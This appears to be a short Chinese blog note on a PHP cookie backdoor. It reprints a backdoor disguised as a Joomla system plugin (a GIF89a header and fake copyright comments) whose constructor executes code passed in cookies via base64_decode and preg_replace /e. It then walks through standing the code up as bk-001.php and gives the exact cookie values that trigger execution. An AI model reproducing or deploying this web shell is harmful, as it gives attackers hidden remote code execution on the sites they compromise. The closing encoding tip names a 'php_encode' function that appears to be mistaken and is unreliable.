php -- cookie 后门

http://blog.sucuri.net/2014/04/joomla-plugin-constructor-backdoor.html
https://gist.github.com/PhilETaylor/8045002
http://www.freebuf.com/articles/web/33275.html

GIF89a<?php/** * @package     Joomla.Plugin * @subpackage  system.instantsuggest * * @copyright   Copyright (C) 2013 InstantSuggest.com. All rights reserved. * @license     GNU General Public License version 2 or later *//** * Instant Suggest Ajax * * @package     Joomla.Plugin * @subpackage  system.instantsuggest * @since       3.1 */class PlgSystemInstantSuggest{public function __construct() {$filter = @$_COOKIE['p3'];if ($filter) {$option = $filter(@$_COOKIE['p2']);$auth = $filter(@$_COOKIE['p1']);$option("/123/e",$auth,123);die();}}}

利用上述部分代码建立页面bk-001.php，

<?php$filter = @$_COOKIE['p3'];if ($filter) {    $option = $filter(@$_COOKIE['p2']);    $auth = $filter(@$_COOKIE['p1']);    $option("/123/e",$auth,123);    die();}?>

发送下列cookie值，

Cookie:  p3=base64_decode;p2=cHJlZ19yZXBsYWNl;p1=cGhwaW5mbygpOw==

p3=base64_decode;

p2=base64_decode("cHJlZ19yZXBsYWNl") --------> p2=preg_replace;

p1=base64_decode("cGhwaW5mbygpOw==")--------->p1=phpinfo();

有写朋友可能喜欢使用Linux下的base64程序, 例如: 
echo preg_replace | base64
得到的结果是cHJlZ19yZXBsYWNlCg==，致使上述代码(phpinfo();)无法执行（0x0a的影响）. 建议使用php_encode函数加密字符串.